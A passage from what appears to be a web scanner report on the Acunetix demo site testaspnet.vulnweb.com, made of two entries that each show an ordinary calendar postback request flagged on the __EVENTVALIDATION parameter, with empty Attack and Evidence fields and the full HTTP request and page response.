Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1137 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,137 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8440&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgBAVpYwCtsIZGRk5XVrWaX4SBcm%2FWr9IW5%2BsJtPcXE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKfj5HKBwLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBdEK1qAoCPu86CBmxokdL7T2T12Y
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:13:15 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgBAVpYwCtsIZGRk5XVrWaX4SBcm/Wr9IW5+sJtPcXE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKfj5HKBwLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBdEK1qAoCPu86CBmxokdL7T2T12Y" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:White" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1137 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,137 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8449&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgAADhRDEdsIZGRkfL7KKg0OQytO7Z9ARAIeCNp1hCg%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKfs%2FPuBgLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBWUBjFU%2FsY4JXRSik2zQkrnJzqzR
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:39:29 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgAADhRDEdsIZGRkfL7KKg0OQytO7Z9ARAIeCNp1hCg=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKfs/PuBgLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBWUBjFU/sY4JXRSik2zQkrnJzqzR" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:White" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
